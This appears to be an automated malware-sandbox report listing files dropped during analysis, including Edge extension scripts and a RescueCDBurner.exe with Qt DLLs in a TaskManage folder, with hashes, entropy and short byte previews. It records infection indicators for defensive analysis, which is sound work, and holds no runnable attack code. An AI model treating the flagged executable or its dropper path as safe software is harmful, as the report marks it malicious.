                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):122218
                                                                                                                                                                  Entropy (8bit):5.439997574414675
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                  MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                  SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                  SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                  SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):130866
                                                                                                                                                                  Entropy (8bit):5.425065147784983
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                  MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                  SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                  SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                  SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\fc8bf7e7-09ce-4ea0-892d-1079b9d9a354.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_850893665\14d638ef-0e4c-40d6-81eb-094ed8eb986a.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_850893665\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_850893665\CRX_INSTALL\content.js

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_850893665\CRX_INSTALL\content_new.js

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_850893665\CRX_INSTALL\manifest.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                  C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2598912
                                                                                                                                                                  Entropy (8bit):6.6049974235008655
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                                  MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                                  SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                                  SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                                  SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<*,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&..*...Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8581632
                                                                                                                                                                  Entropy (8bit):6.736578346160889
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                                  MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                                  SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                                  SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                                  SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1053696
                                                                                                                                                                  Entropy (8bit):6.539052666912709
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                                  MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                                  SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                                  SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                                  SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):356352
                                                                                                                                                                  Entropy (8bit):6.447802510709224
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                                  MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                                  SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                                  SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                                  SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6487736
                                                                                                                                                                  Entropy (8bit):7.518089126573906
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                                  MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                  SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                                  SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                                  SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dll

                                                                                                                                                                  Download File
